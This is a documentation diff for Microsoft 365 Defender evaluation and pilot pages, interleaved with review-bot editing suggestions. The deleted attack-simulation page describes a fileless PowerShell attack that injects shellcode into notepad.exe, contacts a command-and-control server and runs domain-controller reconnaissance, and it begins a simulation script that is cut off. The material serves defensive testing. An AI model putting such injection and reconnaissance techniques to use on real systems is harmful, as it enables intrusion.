+description: Use this article to promote your evals of MDI, MDO, MDE, and MCAS to your live environment in Microsoft 365 Defender or M365D.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
++
+f1.keywords:
+ - NOCSH
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Promote your Microsoft 365 Defender evaluation environment to production
+
+**Applies to:**
+- Microsoft 365 Defender
+
+To promote your Microsoft 365 Defender evaluation environment to production, first purchase the necessary license. Follow the steps in [Create the eval environment](eval-create-eval-environment.md) and purchase the Office 365 E5 license (instead of selecting Start free trial).
+
+Next, complete any additional configuration and expand your pilot groups until these have reached full production.
+
+## Microsoft Defender for Identity
+Defender for Identity doesn't require any additional configuration. Just make sure you've purchased the necessary licenses and installed the sensor on all of your Active Directory domain controllers and Active Directory Federation Services (AD FS) servers.
+
+## Microsoft Defender for Office 365
+After successfully evaluating or piloting MDO, it can be promoted to your entire production environment.
+1. Purchase and provision the necessary licenses and assign them to your production users.
+2. Re-run recommended baseline policy configurations (either Standard or Strict) against your production email domain or specific groups of users.
+3. Optionally create and configure any custom MDO policies against your production email domain or groups of users. However, remember that any assigned baseline policies will always take precedence over custom policies.
+4. Update the public MX record for your production email domain to resolve directly to EOP.
+5. Decommission any third-party SMTP gateways and disable or delete any EXO connectors associated with this relay.
+
+## Microsoft Defender for Endpoint
+To promote Microsoft Defender for Endpoint evaluation environment from a pilot to production, simply onboard more endpoints to the service using any of the [supported tools and methods](/defender-endpoint/onboard-configure).
+
+Use the following general guidelines to onboard more devices to Microsoft Defender for Endpoint.
+
+1. Verify that the device fulfills the [minimum requirements](/defender-endpoint/minimum-requirements).
+2. Depending on the device, follow the configuration steps provided in the onboarding section of the Defender for Endpoint portal.
+3. Use the appropriate management tool and deployment method for your devices.
+4. Run a detection test to verify that the devices are properly onboarded and reporting to the service.
+
+## Microsoft Cloud App Security
+Microsoft Cloud App Security doesn't require any additional configuration. Just make sure you've purchased the necessary licenses. If you've scoped the deployment to certain user groups, increase the scope of these groups until you reach production scale.
+
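Review bot: In the Defender for Office 365 list, step 5 (decommission the third-party SMTP gateway and its EXO connectors) directly follows step 4 (point the public MX record at EOP) with no wait; because the old MX record stays cached until its DNS TTL expires, mail keeps arriving at the gateway for a while, so suggest inserting "after confirming the new MX record has propagated" between the two, reusing the MX audit from the enable-eval article. Also, the opening paragraph says to purchase "the Office 365 E5 license", but the article then covers Defender for Identity, Defender for Endpoint and Cloud App Security as well; confirm the licensing statement is meant to cover those sections too. Minor: "To promote Microsoft Defender for Endpoint evaluation environment" is missing "the".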
security Eval Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-overview.md
+
+ Title: Evaluate and pilot Microsoft 365 Defender, an XDR, to prevent, detect, investigate, respond, endpoints, identities, apps, email, collaborative applications, data.
+description: Plan your Microsoft 365 Defender trial lab or pilot environment to test and experience a security solution designed to protect devices, identity, data, and applications.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 06/25/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Evaluate and pilot Microsoft 365 Defender
+
+**Applies to:**
+
+- Microsoft 365 Defender
+
+Microsoft 365 Defender is an extended detection and response (XDR) solution that automatically collects, correlates and analyzes signal, threat and alert data from across your Microsoft 365 environment, including endpoint, email, applications and identities. It leverages extensive AI and automation to automatically stop attacks and remediate affected assets to a safe state. The following articles step you through the process of setting up a trial environment so you can evaluate the features and capabilities of Microsoft 365 Defender.
+
+As you walk through these articles, the steps will illustrate how to enable each component, configure settings, and begin monitoring with a pilot group. When youΓÇÖre ready, you can finish by promotion your evaluation environment directly into production.
+
+Microsoft recommends you create your evaluation in an existing production subscription of Office 365. This way you will gain real-world insights immediately and can tune settings to work against current threats in your environment. After youΓÇÖve gained experience and are comfortable with the platform, simply promote each component, one at a time, to production.
++
+## The anatomy of an attack
+
+Microsoft 365 Defender is a Cloud-based, unified, pre- and post-breach enterprise defense suite. It coordinates *prevention*, *detection*, *investigation*, and *response* across endpoints, identities, apps, email, collaborative applications, and all of their data.
+
+In this illustration an attack is underway. Phishing email arrives at the Inbox of an employee in your organization, who unknowingly opens the email attachment. This installs malware, which leads to a chain of events that could end with the theft of sensitive data. But in this case, Defender for Office 365 is in operation.
+
+![How Microsoft 365 Defender stops a chain of threats](../../media/defender/m365-defender-eval-threat-chain.png)
+
+In the illustration:
+
+- **Exchange Online Protection**, part of Microsoft Defender for Office 365, can detect the phishing email and use mail flow rules to make certain it never arrives in the Inbox.
+- **Defender for Office 365** safe attachments tests the attachment and determines it is harmful, so the mail that arrives either isn't actionable by the user, or policies prevent the mail from arriving at all.
+- **Defender for Endpoint** manages devices that connect to the corporate network and detect device and network vulnerabilities that might otherwise be exploited.
+- **Defender for Identity** takes note of sudden account changes like privilege escalation, or high-risk lateral movement. It also reports on easily exploited identity issues like unconstrained Kerberos delegation, for correction by the security team.
+- **Microsoft Cloud App Security** notices anomalous behavior like impossible-travel, credential access, and unusual download, file share, or mail forwarding activity and reports these to the security team.
+
+### Microsoft 365 Defender components
+
+Microsoft 365 Defender is made up of these security technologies, operating in tandem. You donΓÇÖt need all of these components to benefit from the capabilities of XDR and Microsoft 365 Defender. You will realize gains and efficiencies through using one or two as well.
+
+|Component |Description |Reference material |
+||||
+|Microsoft Defender for Identity | Microsoft Defender for Identity uses Active Directory signals to identify, detect, and investigate advanced threats, compromised identities, and malicious insider actions directed at your organization. | [What is Microsoft Defender for Identity?](/defender-for-identity/what-is) |
+|Exchange Online Protection | Exchange Online Protection is the native cloud-based SMTP relay and filtering service that helps protect your organization against spam and malware. | [Exchange Online Protection (EOP) overview - Office 365](../office-365-security/overview.md) |
+|Microsoft Defender for Office 365 | Microsoft Defender for Office 365 safeguards your organization against malicious threats posed by email messages, links (URLs) and collaboration tools. | [Microsoft Defender for Office 365 - Office 365](../office-365-security/overview.md) |
+|Microsoft Defender for Endpoint | Microsoft Defender for Endpoint is a unified platform for device protection, post-breach detection, automated investigation, and recommended response. | [Microsoft Defender for Endpoint - Windows security](../defender-endpoint/microsoft-defender-endpoint.md) |
+|Microsoft Cloud App Security | Microsoft Cloud App security is a comprehensive cross-SaaS solution bringing deep visibility, strong data controls, and enhanced threat protection to your cloud apps. | [What is Cloud App Security?](/cloud-app-security/what-is-cloud-app-security) |
+|Azure AD Identity Protection|Azure AD Identity Protection evaluates risk data from billions of sign-in attempts and uses this data to evaluate the risk of each sign-in to your environment. This data is used by Azure AD to allow or prevent account access, depending on how Conditional Access policies are configured. Azure AD Identity Protection is licensed separately from Microsoft 365 Defender. It is included with Azure Active Directory Premium P2.|[What is Identity Protection?](/azure/active-directory/identity-protection/overview-identity-protection)|
+| | | |
+
+## Microsoft 365 Defender architecture
+
+The diagram below illustrates high-level architecture for key Microsoft 365 Defender components and integrations. *Detailed* architecture for each Defender component, and use-case scenarios, are given throughout this series of articles.
+
+![Microsoft 365 Defender high-level architecture](../../media/defender/m365-defender-eval-architecture.png)
+
+In this illustration:
+
+- Microsoft 365 Defender combines the signals from all of the Defender components to provide extended detection and response (XDR) across domains. This includes a unified incident queue, automated response to stop attacks, self-healing (for compromised devices, user identities, and mailboxes), cross-threat hunting, and threat analytics.
+- Microsoft Defender safeguards your organization against malicious threats posed by email messages, links (URLs), and collaboration tools. It shares signals resulting from these activities with Microsoft 365 Defender. Exchange Online Protection (EOP) is integrated to provide end-to-end protection for incoming emails and attachments.
+- Microsoft Defender for Identity gathers signals from servers running Active Directory Federated Services (AD FS) and on-premises Active Directory Domain Services (AD DS). It uses these signals to protect your hybrid identity environment, including protecting against hackers that use compromised accounts to move laterally across workstations in the on-premises environment.
+- Microsoft Defender for Endpoint gathers signals from and protects devices used by your organization.
+- Microsoft Cloud App Security gathers signals from your organization's use of cloud apps and protects data flowing between your environment and these apps, including both sanctioned and unsanctioned cloud apps.
+- Azure AD Identity Protection evaluates risk data from billions of sign-in attempts and uses this data to evaluate the risk of each sign-in to your environment. This data is used by Azure AD to allow or prevent account access, depending on how Conditional Access policies are configured. Azure AD Identity Protection is licensed separately from Microsoft 365 Defender. It is included with Azure Active Directory Premium P2.
+
+Additional optional architecture components not included in this illustration:
+
+- Detailed signal data from all Microsoft Defender components can be integrated into Azure Sentinel and combined with other logging sources to offer full SIEM and SOAR capabilities and insights.
+
+## The evaluation process
+
+Microsoft recommends enabling the components of Microsoft 365 in the order illustrated:
+
+![Microsoft 365 Defender high-level evaluation process](../../media/defender/m365-defender-eval-process.png)
+
+The following table describes this illustration.
+
+| |Step |Description |
+||||
+|1 | [Create the evaluation environment](eval-create-eval-environment.md) |This step ensures you have the trial license for Microsoft 365 Defender. |
+|2 | [Enable Defender for Identity](eval-defender-identity-overview.md) | Review the architecture requirements, enable the evaluation, and walk through tutorials for identifying and remediating different attack types. |
+|3 | [Enable Defender for Office 365 ](eval-defender-office-365-overview.md) | Ensure you meet the architecture requirements, enable the evaluation, and then create the pilot environment. This component includes Exchange Online Protection and so you will actually evaluate *both* here. |
+|4 | [Enable Defender for Endpoint ](eval-defender-endpoint-overview.md) | Ensure you meet the architecture requirements, enable the evaluation, and then create the pilot environment. |
+|5 | [Enable Microsoft Cloud App Security](eval-defender-mcas-overview.md) | Ensure you meet the architecture requirements, enable the evaluation, and then create the pilot environment. |
+|6 | [Investigate and respond to threats](eval-defender-investigate-respond.md) | Simulate an attack and begin using incident response capabilities. |
+|7 | [Promote the trial to production](eval-defender-promote-to-production.md) | Promote the Microsoft 365 components to production one-by-one. |
+| | | |
+
+This is a commonly recommended order designed to gain the value of the capabilities quickly based on how much effort is typically required to deploy and configure the capabilities. For example, Defender for Office 365 can be configured much quicker than is required to enroll devices for Defender for Endpoint. Of course you can prioritize the components to meet your business needs and enable these in a different order.
+
+## Next steps
+
+[Create the Microsoft 365 Defender Evaluation Environment](eval-create-eval-environment.md)
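Review bot: in the architecture bullet list, "Microsoft Defender safeguards your organization against malicious threats posed by email messages, links (URLs), and collaboration tools" names the wrong product; it describes Microsoft Defender for Office 365 (compare the component table), so the bullet should read "Microsoft Defender for Office 365 safeguards ...". Smaller fixes in the same hunk: "Microsoft recommends enabling the components of Microsoft 365 in the order illustrated" should say "Microsoft 365 Defender"; "finish by promotion your evaluation environment" should be "by promoting"; "Defender for Endpoint manages devices ... and detect device and network vulnerabilities" needs "detects"; the attack-chain paragraph ends "Defender for Office 365 is in operation" although the bullets that follow describe all five components, so "Microsoft 365 Defender is in operation" matches the list; the link texts "[Enable Defender for Office 365 ]" and "[Enable Defender for Endpoint ]" carry trailing spaces; and both tables end with an empty "| | | |" row that renders as a blank line. The front matter also looks incomplete: the list beginning "- M365-security-compliance" has no `ms.collection:` key above it, so confirm the YAML block is valid before merge.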
security Generate Test Alert https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/generate-test-alert.md
- Title: Generate a test Microsoft 365 Defender alert
-description: Generate a test alert to try how your Microsoft 365 Defender lab environment works
-keywords: Microsoft 365 Defender simulation, try Microsoft 365 Defender, generate test alert in Microsoft 365 Defender, test alert in Microsoft 365 Defender evaluation lab
-search.product: eADQiWindows 10XVcnh
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
--
-localization_priority: Normal
--
- - M365-security-compliance
- - m365solution-evalutatemtp
---
-# Generate a test alert in your Microsoft 365 Defender evaluation lab
---
-**Applies to:**
-- Microsoft 365 Defender-
-Now that you've completed your Microsoft 365 Defender evaluation lab setup and configuration, you can run a threat attack simulation to experience the detection, alert correlation, and self-healing remediation capabilities of the integrated security solution.
-
-1. Log on to https://security.microsoft.com
-2. On the Home page, look for a tile titled **Simulation**. Review the walkthrough guide for steps to create a test incident in Microsoft 365 Defender.
-<br>![Image of simulation card in the Microsoft 365 Security dashboard](../../media/mtp-eval-73.png) <br>
-
-## Next steps
-
-Browse through the [Microsoft 365 solution and architecture center](../../solutions/index.yml) to understand how to design the solution and architecture that is right for your organization.
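Review bot: this removes generate-test-alert.md outright, and no redirect is visible in the change; the new series covers the same walkthrough under "Investigate and respond to threats" (eval-defender-investigate-respond.md, "Simulate an attack and begin using incident response capabilities"), so add a redirect from the deleted path to that page so existing bookmarks and inbound links don't 404.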
security M365d Evaluation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-evaluation.md
- Title: Evaluate Microsoft 365 Defender
-description: Set up your Microsoft 365 Defender trial lab or pilot environment to try out and experience the security solution designed to protect devices, identity, data, and applications in your organization.
-keywords: Microsoft 365 Defender trial, try Microsoft 365 Defender, evaluate Microsoft 365 Defender, Microsoft 365 Defender evaluation lab, Microsoft 365 Defender pilot, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
-search.product: eADQiWindows 10XVcnh
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
--
-localization_priority: Normal
--
- - M365-security-compliance
- - m365solution-overview
- - m365solution-evalutatemtp
---
-# Create a Microsoft 365 Defender trial lab or pilot environment
---
-**Applies to:**
-- Microsoft 365 Defender--
-This guide helps you work across setting up a lab environment with users and groups, then guides you through the configuration of the capabilities in Microsoft 365 Defender so that you can mimic a threat attack and obtain a meaningful trial result.
-
-The purpose of creating this trial lab or pilot environment is to illustrate the comprehensive and integrated Microsoft 365 Defender capabilities. Experience how this intelligent security solution detects, prevents, automatically investigates, and responds to advanced threats your organization.
--
-You will be guided through the steps to start your Microsoft 365 Defender evaluation based on the recommended deployment paths. The goal is to help you set up the security solution either in a lab environment with a trial account, or in a pilot environment in production with a full license. Preparing your trial lab or pilot environment can help you present security operation use cases to decision makers in your organization. When youΓÇÖre done running your attack simulations and are satisfied with the results, you can fully deploy and operationalize it in your organization with the help of Microsoft Technical Sales Professionals or experts in your organization.
-
-This guide will help you:
-- Set up your lab server and computers-- Configure Active Directory with users and groups-- Set up and configure Microsoft Defender for Identity, Microsoft Defender for Office 365, Microsoft Defender for Endpoint, and Microsoft Cloud App Security-- Set up local policies for your server and computers-- Mimic a threat attack to generate a test incident or alert in Microsoft 365 Defender-
->[!IMPORTANT]
->For optimum results, follow the lab setup instructions as closely as possible.
--
-## Deployment phases
-
-There are three phases in creating a Microsoft 365 Defender trial lab environment.
-
-![Deployment phases: prepare, setup, onboard](../../media/evaluation-guide-phases.png)
-
-|Phase | Description |
-|:-|:--|
-|[Phase 1: Prepare](prepare-m365d-eval.md)| Learn what you need to consider when deploying Microsoft 365 Defender in a trial lab or pilot environment: <br><br>- Stakeholders and sign-off <br> - Environment considerations <br>- Access <br>- Azure Active Directory setup <br> - Configuration order
-|[Phase 2: Setup](setup-m365deval.md)| Take the initial steps to access Microsoft 365 Security Center to set up your Microsoft 365 Defender trial lab or pilot environment. You'll be guided to:<br><br>- Sign up for Microsoft 365 E5 Trial <br> - Configure domain<br>- Assign Microsoft 365 E5 licenses<br>- Complete the setup wizard in the portal|
-|[Phase 3: Configure & Onboard](config-m365d-eval.md) | Configure each Microsoft 365 Defender pillar and onboard endpoints. You'll be guided to:<br><br>- Configure Microsoft Defender for Office 365<br>- Configure Microsoft Cloud App Security<br>- Configure Microsoft Defender for Identity<br>- Configure Microsoft Defender for Endpoint
--
-After you've completed this guide, you would have identified the stakeholders involved and the required approvals, have the right access permissions, signed up for trial, configured domains and each of the Microsoft 365 Defender pillars, and your endpoints will be onboarded to the service.
-
-## Key capabilities
-
-While Microsoft 365 Defender provides many capabilities, the primary purpose of this deployment guide is to get you started by onboarding devices. In addition to onboarding, this guidance gets you started with the following capabilities.
--
-Capability | Description
-:|:
-Microsoft Defender for Office 365 | Helps protect your entire Office 365 envrionment from today's threats
-Microsoft Defender for Identity | Identifies and detects threats on compromised identities and malicious insider actions.
-Microsoft Cloud App Security | Provides rich visibility, control data travel, and detect cyberthreats across cloud services.
-Microsoft Defender for Endpoint | Prevents, detects, and provides response capabilities to advanced threats with comprehensive endpoint security.
--
-## In scope
-
-The following tasks are in scope for this guide:
-- Set up Azure Active Directory-- Set up Microsoft 365 Defender
- - Sign up for Microsoft 365 E5 Trial or use your full license if you're running a pilot
- - Configure domain
- - Assign Microsoft 365 E5 licenses
- - Completing the setup wizard within the portal
-- Configure all Microsoft 365 Defender pillars based on best practices
- - Microsoft Defender for Office 365
- - Microsoft Defender for Identity
- - Microsoft Cloud App Security
- - Microsoft Defender for Endpoint
-
-## Out of scope
-
-The following are out of scope of this deployment guide:
--- Configuration of third-party solutions that might integrate with Microsoft 365 Defender-- Penetration testing in production environment-
-## Next step
-[Phase 1: Prepare](prepare-m365d-eval.md)
-<br> Prepare your Microsoft 365 Defender trial lab or pilot environment
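Review bot: the deleted page is the only visible entry point to prepare-m365d-eval.md, setup-m365deval.md and config-m365d-eval.md (the Phase 1 to 3 table and the Next step link at the bottom); those pages do not appear in this change as shown, so either remove them in the same PR or redirect them as well, and redirect m365d-evaluation.md to eval-overview.md (the trial-licence step it covered now lives in eval-create-eval-environment.md).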
security M365d Pilot Close https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-pilot-close.md
- Title: Summarizing your pilot Microsoft 365 Defender project results
-description: Conclude your pilot Microsoft 365 Defender project by completing your scorecard, analyzing your report findings, and deciding how to move forward.
-keywords: Microsoft 365 Defender pilot, decide what to do next after pilot Microsoft 365 Defender project, what to do after evaluating Microsoft 365 Defender in production, transition from Microsoft 365 Defender pilot to deployment, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
-search.product: eADQiWindows 10XVcnh
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
--
-localization_priority: Normal
--
- - M365-security-compliance
- - m365solution-scenario
- - m365solution-pilotmtpproject
---
-# Closing and summarizing your Microsoft 365 Defender pilot
---
-**Applies to:**
-- Microsoft 365 Defender---
-|[![Planning](../../medi) | ![Close and summarize](../../media/phase-diagrams/4-summary.png)<br/>Close and summarize|
-|--|--|--|--|
-|| | |*You are here!*|
--
-You're currently in the closing and summarizing phase.
-
-YouΓÇÖve just ran an advanced memory-only attack simulation that executed code remotely on a domain controller. YouΓÇÖve seen how Microsoft Defender for Endpoint and Microsoft Defender for Identity detect and create alerts on stealthy malicious activity. YouΓÇÖve also seen how alerts from different sources are delivered along with other contextual information into a single incident in the Microsoft 365 Security Center portal. Experiencing such integration enables SOC analysts to investigate and take necessary action. YouΓÇÖve also created an advanced hunting query that will identify inbound emails where the user opened or saved the attachment and created detection based on that query.
-
-YouΓÇÖve reached the end of the process after all tests have concluded.
-
-The final output should be:
--- A completed scorecard-- A detailed report of the findings of the pilot-- A decision on how to move forward-
-Present the reports from your final output to internal stakeholders (which youΓÇÖve identified during the [preparation](./prepare-m365d-eval.md) phase) and Microsoft contacts. Such an effort ensures that any feedback can be used to improve products and documentation.
-
-We hope you enjoyed this simulation. Start implementing what you've learned on a larger scale in your organization to get the most out of the integrated security solution.
-
-## Next step
-Learn more about the Microsoft 365 Defender pillars through the following interactive guides:
-- [Safeguard your organization with Microsoft Defender for Office 365](https://aka.ms/O365ATP-Interactive-Guide)-- [Detect suspicious activities and potential attacks with Microsoft Defender for Identity](https://aka.ms/AATP-Interactive-Guide)-- [Detect threats and manage alerts with Microsoft Cloud App Security](https://aka.ms/DetectThreatsAndAlertsMCAS-InteractiveGuide)-- [Investigate and remediate threats with Microsoft Defender for Endpoint](https://aka.ms/MDATP-IR-Interactive-Guide)
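Review bot: the four interactive-guide links under Next step (aka.ms/O365ATP-Interactive-Guide, aka.ms/AATP-Interactive-Guide, aka.ms/DetectThreatsAndAlertsMCAS-InteractiveGuide, aka.ms/MDATP-IR-Interactive-Guide) do not reappear anywhere in the new eval-overview.md, whose Next steps section has only the create-environment link; if the guides are still current, carry them into the new series (the component table's "Reference material" column is the natural place) rather than dropping them with the page.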
security M365d Pilot Plan https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-pilot-plan.md
- Title: Planning your pilot Microsoft 365 Defender project
-description: Plan your pilot Microsoft 365 Defender project with stakeholders to manage expectations and ensure successful outcome.
-keywords: Microsoft 365 Defender pilot, plan pilot Microsoft 365 Defender project, evaluate Microsoft 365 Defender in production, Microsoft 365 Defender pilot project, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
-search.product: eADQiWindows 10XVcnh
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
--
-localization_priority: Normal
--
- - M365-security-compliance
- - m365solution-scenario
- - m365solution-pilotmtpproject
---
-# Planning your pilot Microsoft 365 Defender project
---
-**Applies to:**
-- Microsoft 365 Defender-
-|![Planning](../../medi)|
-|--|--|--|--|
-|*You are here!*| | | |
-
-You're currently in the planning phase.
-
-To ensure that your pilot project is a success, it is essential to plan thoroughly with and get approvals from your stakeholders in the beginning. Elements of planning include identifying scope, use cases, requirements, and success criteria.
-
-This guide walks you through how to plan your pilot project.
-
->[!IMPORTANT]
->For optimum results, follow the pilot instructions as closely as possible.
--
-## Scope
-
-The scope of the pilot will determine how broad the test will be, based on your environment and acceptable testing methods. Here are some example scopes to consider:
--- Development or test environment which includes endpoints, servers, domain controllers.-- Production environment with Microsoft 365, Azure, Active Directory services, endpoints, and servers-
->[!NOTE]
->If you donΓÇÖt have the full licenses yet, you can get trial licenses to [evaluate Microsoft 365 Defender](m365d-evaluation.md?ocid=cx-docs-MTPtriallab) ΓÇô plan, prepare, setup, configure, and run your pilot project. Your stakeholders will play a big role in helping facilitate the process from start to finish.
-
-The types of operating systems to be evaluated should also be defined based on the organizational makeup. This may include the following: [Mac endpoints](/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-atp-mac#system-requirements), [Linux Servers](/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-atp-linux#system-requirements), [Windows 10 endpoints](/windows/security/threat-protection/microsoft-defender-atp/minimum-requirements#supported-windows-versions), [Windows Server 2016](/windows/security/threat-protection/microsoft-defender-atp/minimum-requirements#supported-windows-versions).
-
-## Use cases
-
-Use cases represent statements of how the tool being tested is meant to be consumed by its intended users. These can be formulated as user stories from the point of view of a particular persona, such as a SOC analyst. For example:
--- As a SOC analyst, I need to view, correlate, assess and manage alerts and events across devices, users, and mailboxes in my network. [Incident management]-- As a SOC analyst, I must have the tool and process to automatically investigate and respond to malicious events in my network. [Auto IR]-- As a SOC analyst, I must search data from my environment to find known and potential threats, and suspicious activities. [Advanced Hunting]-
-Keep in mind that these use cases should be created within the parameters of the defined scope. If, for example, the scope of testing does not include an evaluation of tools such as Microsoft Cloud App Security, then use cases that rely on this as a data source should not be created.
-
-## Requirements
-
-From the list of use cases, you can start to create requirements. Requirements include features a tool must have to satisfy the use cases. These requirements can be broken down into categories such as configuration and maintenance, support for integrations, and feature-specific requirements like hunting ability and the ability to build custom alerts.
-
-## Test plan
-
-Depending on the requirements, different methods of testing may be appropriate. For instance, if the requirement is to evaluate the efficacy of Automated Remediation, the test plan needs to include steps to generate the behavior(s) that would trigger an automated remediation action within Microsoft 365 Defender. If the requirement is to detect a particular behavior or attack, then the test may involve more steps. The point is to have a plan in place to accurately test against your requirements.
-
-## Success criteria
-
-Success criteria is ultimately the bar set to measure against what you are testing. Whether you are testing Microsoft 365 Defender (or any other technology for that matter) against other tools or by itself, there must be some quantifiable criteria to determine the value the tool provides. Based on the scope, requirements, and testing plan, the success criteria will determine how to score the test. This should be less of a pass or fail and more of a weighted scoring based on your needs. For example, to be successful, a tool may need to score above 80% in certain critical areas you identify.
-
-## Scorecard
-
-One way to bring all elements of your plan together can be to create a scorecard. See a sample scorecard below:
-
-| Use case | Requirements | Configuration requirements | Test plan | Expected outcome | Test status | Score | Notes |
-|:-|:-|:-|:-|:-|:-|:-|:-|
-|Incident management|- Microsoft 365 Defender </br></br>- Microsoft Defender for Identity </br></br>- Microsoft Defender for Endpoint </br></br>- Microsoft Cloud App Security (optional)|See the [prerequisites](m365d-evaluation.md?ocid=cx-docs-MTPtriallab) for preparation, set-up, and configuration for details |[Simulate attack](m365d-pilot-simulate.md) <br></br>[Investigate the incident](./m365d-pilot-simulate.md#investigate-an-incident) |Investigators can understand the scope and impact of the incident and manage the incident||||
-|AutoIR|- Microsoft 365 Defender </br></br>- Microsoft Defender for Identity </br></br>- Microsoft Defender for Endpoint |See the [prerequisites](m365d-evaluation.md?ocid=cx-docs-MTPtriallab) for preparation, set-up, and configuration for details <br>Enable AutoIR |[Simulate attack](m365d-pilot-simulate.md) <br></br>[Automated investigation](m365d-pilot-simulate.md#automated-investigation-and-remediation) |Alerts and incidents are automatically remediated by Microsoft 365 Defender||||
-|Advanced hunting|- Microsoft 365 Defender </br></br>- Microsoft Defender for Endpoint </br></br>-Microsoft Defender for Office 365 |See the [prerequisites](m365d-evaluation.md?ocid=cx-docs-MTPtriallab) for preparation, set-up, and configuration for details|[Advanced hunting scenario](./m365d-pilot-simulate.md#advanced-hunting-scenario) |Investigators can find data through advanced hunting, pivoting to impacted entities, and by creating custom detections||||
-
-## Next step
-
-|![Preparation phase](../../medi) | Prepare your Microsoft 365 Defender pilot environment
-|:-|:--|
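Review bot: the planning guidance removed here (Scope, Use cases, Requirements, Test plan, Success criteria and the sample scorecard table) has no counterpart in the new eval-overview.md, which goes straight from "Create the evaluation environment" to enabling components; if the scorecard is meant to survive, move it into eval-create-eval-environment.md or add a planning step to the new evaluation table, otherwise this deletion silently drops the only success-criteria framework the series offered.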
security M365d Pilot Simulate https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-pilot-simulate.md
- Title: Run your Microsoft 365 Defender attack simulations
-description: Run attack simulations for your Microsoft 365 Defender pilot project to see how it unfolds and is quickly remediated.
-keywords: Microsoft 365 Defender pilot attack simulation, run Microsoft 365 Defender pilot attack simulation, simulate attack in Microsoft 365 Defender, Microsoft 365 Defender pilot project, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
-search.product: eADQiWindows 10XVcnh
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
--
-localization_priority: Normal
--
- - M365-security-compliance
- - m365solution-scenario
- - m365solution-pilotmtpproject
---
-# Run your Microsoft 365 Defender attack simulations
---
-|[![Planning](../../medi)|
-|--|--|--|--|
-|||*You are here!*||
-
-You're currently in the attack simulation phase.
-
-After preparing your pilot environment, it's time to test the Microsoft 365 Defender incident management and automated investigation and remediation capabilities. We'll help you to simulate a sophisticated attack that leverages advanced techniques to hide from detection. The attack enumerates opened Server Message Block (SMB) sessions on domain controllers and retrieves recent IP addresses of users' devices. This category of attacks usually doesn't include files dropped on the victim's deviceΓÇöthey occur solely in memory. They "live off the land" by using existing system and administrative tools and inject their code into system processes to hide their execution, Such behavior allows them to evade detection and persist on the device.
-
-In this simulation, our sample scenario starts with a PowerShell script. A user might be tricked into running a script. Or the script might run from a remote connection to another computer from a previously infected deviceΓÇöthe attacker attempting to move laterally in the network. Detection of these scripts can be difficult because administrators also often run scripts remotely to carry out various administrative activities.
-
-![Fileless PowerShell attack with process injection and SMB reconnaisance attack diagram](../../media/mtp/mtpdiydiagram.png)
-
-During the simulation, the attack injects shellcode into a seemingly innocent process. The scenario requires the use of notepad.exe. We chose this process for the simulation, but attackers would more likely target a long-running system process, such as svchost.exe. The shellcode then goes on to contact the attacker's command-and-control (C2) server to receive instructions on how to proceed. The script attempts executing reconnaissance queries against the domain controller (DC). Reconnaissance allows an attacker to get information about recent user login information. Once attackers have this information, they can move laterally in the network to get to a specific sensitive account
-
-> [!IMPORTANT]
-> For optimum results, follow the attack simulation instructions as closely as possible.
-
-## Simulation environment requirements
-
-Since you have already configured your pilot environment during the preparation phase, ensure that you have two devices for this scenario: a test device and a domain controller.
-
-1. Verify your tenant has [enabled Microsoft 365 Defender](m365d-enable.md#confirm-that-the-service-is-on).
-
-2. Verify your test domain controller configuration:
-
- - Device runs with Windows Server 2008 R2 or a later version.
- - The test domain controller to [Microsoft Defender for Identity](/azure/security-center/security-center-wdatp) and enable [remote management](/windows-server/administration/server-manager/configure-remote-management-in-server-manager).
- - Verify that [Microsoft Defender for Identity and Microsoft Cloud App Security integration](/cloud-app-security/mdi-integration) have been enabled.
- - A test user is created on your domain ΓÇô no admin permissions needed.
-
-3. Verify test device configuration:
-
- 1. Device runs with Windows 10 version 1903 or a later version.
-
- 1. Test device is joined to the test domain.
-
- 1. [Turn on Windows Defender Antivirus](/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features). If you are having trouble enabling Windows Defender Antivirus, see this [troubleshooting topic](/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding#ensure-that-windows-defender-antivirus-is-not-disabled-by-a-policy).
-
- 1. Verify that the test device is [onboarded to Microsoft Defender for Endpoint)](/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints).
-
-If you use an existing tenant and implement device groups, create a dedicated device group for the test device and push it to top level in configuration UX.
-
-## Run the attack scenario simulation
-
-To run the attack scenario simulation:
-
-1. Log in to the test device with the test user account.
-
-2. Open a Windows PowerShell window on the test device.
-
-3. Copy the following simulation script:
-
- ```powershell
- [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$xor
